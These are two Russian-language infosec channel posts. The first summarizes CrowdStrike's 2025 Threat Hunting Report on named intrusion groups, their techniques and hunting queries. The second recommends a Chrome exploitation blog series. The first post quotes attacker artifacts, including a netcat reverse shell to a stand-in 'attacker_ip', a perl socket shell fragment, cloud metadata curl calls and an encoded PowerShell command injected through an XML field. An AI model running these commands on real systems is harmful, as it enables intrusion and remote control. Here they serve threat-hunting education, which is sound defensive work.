🫥 CrowdStrike 2025 Threat Hunting Report

👾 За год OverWatch обработали 215,000+ интерактивных сессий, в которых не сработали ни сигнатуры, ни ML. Только люди + охота. Все атаки — hands-on-keyboard.

Что подметить из репорта:
🔀 Cross-Domain / Cloud: когда атакуют сразу всё
🕷️ BLOCKADE SPIDER:
• Начал с уязвимого VPN → DCSync → lateral через WinRM / PsExec
• Переходил с endpoint на cloud: bypass MFA, создание rogue IAM agent
• Пробивал Entra ID: добавление в “IAM No MFA”, обход геофильтров
• На unmanaged системах ставил Chisel proxy и устраивал SOCKS-туннели
📌 Зафиксированы попытки помешать Falcon Sensor

🐼 OPERATOR PANDA (Salt Typhoon):
• Эксплуатация Cisco IOS/IOS XE (CVE-2023-20198 + CVE-2023-20273)
• Создание локального пользователя → log sanitization → RCE
• Удар по blind-spot: роутеры, VPN, свитчи, вне зоны действия EDR

☁️ Cloud: GENESIS vs MURKY PANDA
🐼 GENESIS PANDA:
• Pivot из Jenkins в облако через IMDS → добавление SSH-ключей и access key
• Использование CSP CLI и команд:
curl http://IP/latest/meta-data/
aws s3 ls
gcloud compute ssh ...
• Жил в control plane, хостил payload на облачных инстансах
• Использовал .NET тул для возвращения в консоль по backdoor key
🐼 MURKY PANDA:
• Атака через trusted relationship → backdoor в Entra ID сервисные учётки
• Компрометация стороннего Azure-провайдера → логины с NAS/VPS
• Отмечена малварь CloudedHope, удаление логов и резкая OPSEC-дисциплина

🔐 Identity: SCATTERED SPIDER и MFA reset через helpdesk
📞 Социнженерия по телефону (vishing):
• MFA reset → SSO логин → SharePoint → PAM → dump ntds.dit
• Отслежено, как они:
меняют IP на резидентские (NSOCKS)
ищут "reset password" шаблоны
работают ночью, чтобы не быть замеченными
SaaS + Identity + Endpoint = полный доступ без вирусов.
🔍 Поиск по:
DeviceLogonEvents
| where AccountName endswith "@domain.com"
| where Timestamp during non-business-hours
| where LogonType == "RemoteInteractive"

⌨️ Endpoint: тихие APT и живые бэкдоры
🐼 GLACIAL PANDA:
• Угроза телеком-сектора на Linux, скрытая и долгая
• Эксплуатация CVE-2016-5195 (Dirty COW) + CVE-2021-4034 (PwnKit)
• ShieldSlide: троянизированный OpenSSH (/usr/sbin/sshd) с логами auth + backdoor-пароль
• Примеры артефактов:
/usr/sbin/cron → изменённый daemon
perl -e 'use Socket; ...' → reverse shell
netcat -e /bin/bash attacker_ip
• LOTL-движение, атаки между дочками компаний
🔍 Охота через:
sha256sum /usr/sbin/sshd | grep -v known_good
ps aux | grep cron | grep -v /usr/sbin/cron

🕳 Vulnerability Hunting:
🕷 GRACEFUL SPIDER:
• Zero-Day в Cleo MFT (CVE-2024-55956) → bypass старого фикса CVE-2024-50623
• Этапы:
Загрузка .zip → C:\VLTrader\temp\
В распаковке XML с параметром выполнения команды
Внедрение shellcode → запуск пиратского Cobalt Strike
• Использовал:
<Mailbox type="system" command="powershell -enc ..." />
Falcon Sensor + OverWatch охота по:
#event_simpleName=PeFileWritten
ContextBaseFileName=java.exe
TargetFileName!=/<known_good_files>/


⚔️ Threat hunting требует выхода за границы одного домена. Только корреляция данных Identity + Cloud + Endpoint + Exposure позволяет отследить такие группировки, как BLOCKADE, OPERATOR, SCATTERED и PANDA-акторов.
☁️ Cloud = новая активная зона APT
🧬 Identity = entry + escalation
💣 Endpoint = persistence + эксфиль
🐱 SIEM и XDR = must have, чтобы не видеть только “что”, но и “почему”

🦔 THF

🔄 Chrome Exploitation.

• Недавно в блоге Operation Zero (компания которая покупает уязвимости в различном ПО\устройствах) была опубликована хорошая статья, которая описывает архитектуру современных браузеров и их эксплуатации на примере Chrome.

• Вы сможете изучить, как устроены подсистемы браузера, как обеспечивается их безопасность и как она нарушается с помощью уязвимостей, примитивов, обходов защит, эксплоитов и их цепочек. Каждая статья будет практической, поэтому с самого начала авторы кратко анализируют несколько известных эксплоитов, компилируют их благодаря публичному репозиторию и пробивают Chrome 130-й версии для Windows.

• Учитывайте, что на данный момент опубликована только первая часть на английском языке. Позже будет опубликовано продолжение, так что следите за блогом. Ну и еще обещают перевод на русский язык, но это не точно.

➡ https://opzero.ru/press/101-chrome-exploitation-part-0-preface

S.E. ▪️ infosec.work ▪️ VT